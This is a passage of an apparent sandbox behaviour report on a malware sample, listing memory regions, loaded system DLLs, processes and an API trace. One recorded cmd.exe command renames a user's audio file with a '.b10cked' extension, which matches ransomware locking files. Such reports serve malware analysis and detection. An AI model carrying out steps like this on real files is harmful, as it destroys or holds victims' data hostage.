end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34025 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34026 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34027 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 34028 start_va = 0x6e0000 end_va = 0x6e6fff entry_point = 0x6e0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 34029 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34030 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34031 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34032 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 34033 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34034 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34035 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000020000" filename = "" Region: id = 34036 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34037 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 34038 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 34039 start_va = 0x71df0000 end_va = 0x71e0cfff entry_point = 0x71df0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 34040 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34041 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 34042 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34043 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34044 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 34045 start_va = 0x76a90000 end_va = 0x76b3bfff 
entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34046 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34047 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34048 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 34049 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34050 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34051 start_va = 0x160000 end_va = 0x227fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 34052 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34053 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 830 os_tid = 0x4d4 Process: id = "600" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x7ea16820" 
os_pid = "0xfa0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "298" os_parent_pid = "0x358" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000b277" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 34056 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34057 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34058 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34059 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 34060 start_va = 0xf50000 end_va = 0xf90fff entry_point = 0xf50000 region_type = mapped_file name = "wmiprvse.exe" filename = 
"\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 34061 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34062 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34063 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34064 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 34065 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34066 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34067 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34068 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 34069 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 34070 start_va = 0x6ebf0000 end_va = 0x6ec07fff entry_point = 0x6ebf0000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 34071 start_va = 0x6ec10000 end_va = 0x6eca5fff entry_point 
= 0x6ec10000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 34072 start_va = 0x6f7c0000 end_va = 0x6f81bfff entry_point = 0x6f7c0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 34073 start_va = 0x73d70000 end_va = 0x73d7efff entry_point = 0x73d70000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 34074 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34075 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 34076 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 34077 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34078 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 34079 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") 
Region: id = 34080 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 34081 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34082 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34083 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 34084 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34085 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 34086 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 34087 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34088 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 
34089 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 34090 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34091 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34102 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 34103 start_va = 0xc0000 end_va = 0x13ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 34104 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 34105 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 34106 start_va = 0x170000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 34107 start_va = 0x300000 end_va = 0x301fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 34108 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 34109 start_va = 0x690000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 34110 start_va = 0x6f0000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 34111 start_va = 0x730000 end_va = 
0x9fefff entry_point = 0x730000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 34112 start_va = 0xa00000 end_va = 0xdf2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 34113 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 34114 start_va = 0x73c00000 end_va = 0x73c20fff entry_point = 0x73c00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 34115 start_va = 0x75730000 end_va = 0x75774fff entry_point = 0x75730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 34146 start_va = 0x310000 end_va = 0x310fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 34147 start_va = 0x320000 end_va = 0x320fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 34148 start_va = 0x560000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 34149 start_va = 0xe80000 end_va = 0xebffff entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 34150 start_va = 0xfa0000 end_va = 0x109ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 34151 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = 
"\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 34152 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 34153 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 34154 start_va = 0x540000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 34155 start_va = 0x6ebe0000 end_va = 0x6ebe9fff entry_point = 0x6ebe0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 34156 start_va = 0x620000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 34157 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 34158 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 34159 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 34160 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 34161 start_va = 0x10c0000 end_va = 0x10fffff entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 34162 start_va = 0x1100000 end_va = 0x113ffff 
entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 34163 start_va = 0x6ef00000 end_va = 0x6ef0efff entry_point = 0x6ef00000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 34164 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 34165 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 34249 start_va = 0x5e0000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 34250 start_va = 0x6e880000 end_va = 0x6e896fff entry_point = 0x6e880000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 34251 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 34272 start_va = 0x71de0000 end_va = 0x71e07fff entry_point = 0x71de0000 region_type = mapped_file name = "wmiprov.dll" filename = "\\Windows\\System32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll") Thread: id = 831 os_tid = 0x354 Thread: id = 834 os_tid = 0x868 Thread: id = 836 os_tid = 0xdf8 Thread: id = 837 os_tid = 0xb7c Thread: id = 838 os_tid = 0xec8 Thread: id = 839 os_tid = 0xadc Thread: id = 840 os_tid = 0x4f4 Thread: id = 843 os_tid = 0x86c Thread: id = 945 os_tid = 0xcec Process: id = "601" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166e0" os_pid = "0x210" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = 
"\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34116 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34117 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34118 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34119 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 34120 start_va = 0x4a4d0000 end_va = 0x4a51bfff entry_point = 0x4a4d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34121 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34122 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34123 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34124 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 34125 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34215 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34216 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34217 start_va = 0x80000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 34218 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 34219 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34220 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34221 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34222 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34223 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = 
mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34224 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34225 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34226 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34227 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34228 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34229 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 34230 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34231 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34232 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 34233 start_va = 0x60000 end_va = 
0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 34234 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 34235 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 34236 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 34237 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 34238 start_va = 0x10f0000 end_va = 0x1252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Thread: id = 832 os_tid = 0xf00 [0227.355] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30ff54 | out: lpSystemTimeAsFileTime=0x30ff54*(dwLowDateTime=0xbb142fa0, dwHighDateTime=0x1d440a9)) [0227.355] GetCurrentProcessId () returned 0x210 [0227.355] GetCurrentThreadId () returned 0xf00 [0227.355] GetTickCount () returned 0x3eb48 [0227.355] QueryPerformanceCounter (in: lpPerformanceCount=0x30ff4c | out: lpPerformanceCount=0x30ff4c*=28414443068) returned 1 [0227.356] GetModuleHandleA (lpModuleName=0x0) returned 0x4a4d0000 [0227.356] __set_app_type (_Type=0x1) [0227.356] __p__fmode () returned 0x76b331f4 [0227.356] __p__commode () returned 0x76b331fc [0227.356] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4f21a6) returned 0x0 [0227.356] __getmainargs (in: _Argc=0x4a4f4238, _Argv=0x4a4f4240, _Env=0x4a4f423c, _DoWildCard=0, _StartInfo=0x4a4f4140 | out: _Argc=0x4a4f4238, _Argv=0x4a4f4240, _Env=0x4a4f423c) returned 0 [0227.357] GetCurrentThreadId 